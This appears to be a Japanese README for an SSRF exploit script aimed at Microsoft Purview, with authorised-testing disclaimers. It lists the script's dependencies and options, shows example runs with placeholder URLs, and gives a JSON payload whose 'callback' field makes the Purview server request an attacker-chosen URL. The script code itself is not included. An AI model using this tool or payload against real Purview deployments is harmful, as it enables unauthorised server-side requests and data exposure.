
Microsoft Purview の SSRF 脆弱性
このリポジトリには、テストおよび教育目的でSSRF(サーバーサイドリクエストフォージェリ)エクスプロイトを実行するためのスクリプトが含まれています。このツールは責任を持って、明示的な許可がある環境でのみ使用してください。
bash (Unixシェル)jq (JSONプロセッサ)curl (HTTPリクエスト用コマンドラインツール)./script.sh --exploit <target_url> <purview_url>
| オプション | 説明 |
|---|
-h, --help | ヘルプメニューを表示します。 |
--exploit tu pu | ターゲットURLとパービューURLを使用してSSRFエクスプロイトを実行します。 |
./script.sh -h
出力:
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
./script.sh --exploit http://example.com http://purview-url.com
期待される出力:
SSRF exploit successful! Data retrieved:
<response data>
SSRF exploit failed! HTTP code: <code>
purview_urlに送信し、SSRF脆弱性の悪用を試みます。./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
HTTPレスポンスコードとボディが保存され、ステータスコードに基づいてエクスプロイトの成功または失敗が判断されます。
このスクリプトはテスト目的のみです。このスクリプトの誤用は、重大な法的結果を招く可能性があります。すべての該当法令と倫理基準を遵守してください。
プルリクエストの作成や問題の報告を通じて、自由に貢献してください。
このツールは教育目的および許可された侵入テストのみを対象としています。 作者は、このツールの誤用またはそれによって引き起こされた損害について一切の責任を負いません。